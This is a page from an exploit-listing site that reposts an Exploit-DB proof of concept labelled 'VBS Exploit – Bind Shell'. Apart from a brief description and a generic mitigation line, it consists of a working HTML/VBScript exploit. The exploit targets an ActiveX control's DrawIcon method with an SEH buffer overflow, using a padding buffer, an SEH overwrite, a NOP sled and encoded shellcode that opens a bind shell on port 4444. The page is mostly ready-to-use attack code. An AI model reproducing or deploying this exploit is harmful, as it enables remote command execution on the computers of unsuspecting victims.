Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
VBS Exploit - Bind Shell - exploit.company
header-logo
Suggest Exploit
vendor:
by:
Unknown
9.8
CVSS
CRITICAL
Remote Code Execution
94
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

VBS Exploit – Bind Shell

This VBS script exploits a vulnerability to create a bind shell on port 4444. The script contains shellcode that is executed when the script is run. The shellcode sets up a listener on port 4444 and allows remote attackers to connect and execute commands on the target system.

Mitigation:

To mitigate this vulnerability, ensure that VBS scripts are not executed without proper validation and security measures. Additionally, restrict network access to vulnerable systems.
Source

Exploit-DB raw data:

<html>
<object classid='clsid:1DC09FDF-2EF8-4CE9-ADEA-4D6A98A2F779' id='target'></object>
<script language='vbscript'>

' 988 bytes for shellcode
' bind shell port 4444
sc =  unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
               unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
               unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
               unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
               unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
               unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
               unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
               unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
               unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _
               unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _
               unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _
               unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _
               unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _
               unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _
               unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _
               unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _
               unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _
               unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _
               unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _
               unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _
               unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _
               unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _
               unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _
               unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _
               unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _
               unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _
               unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _
               unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _
               unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _
               unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _
               unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _
               unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _
               unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _
               unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _
               unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _
               unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _
               unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _
               unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _
               unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _
               unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _
               unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _
               unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _
               unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _
               unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _
               unescape("%4f%4f%42%4d%5a")


buffer1 = string(619, "A")
next_seh = unescape("%eb%06%90%90")
seh = unescape("%56%29%d1%72")
nops = string(10, unescape("%90"))
arg2=1
arg3=1
arg4=1

exploit = buffer1 + next_seh + seh + nops + sc
target.DrawIcon exploit ,arg2 ,arg3 ,arg4

</script>

Navigation

Suggest Exploit

Services By CQR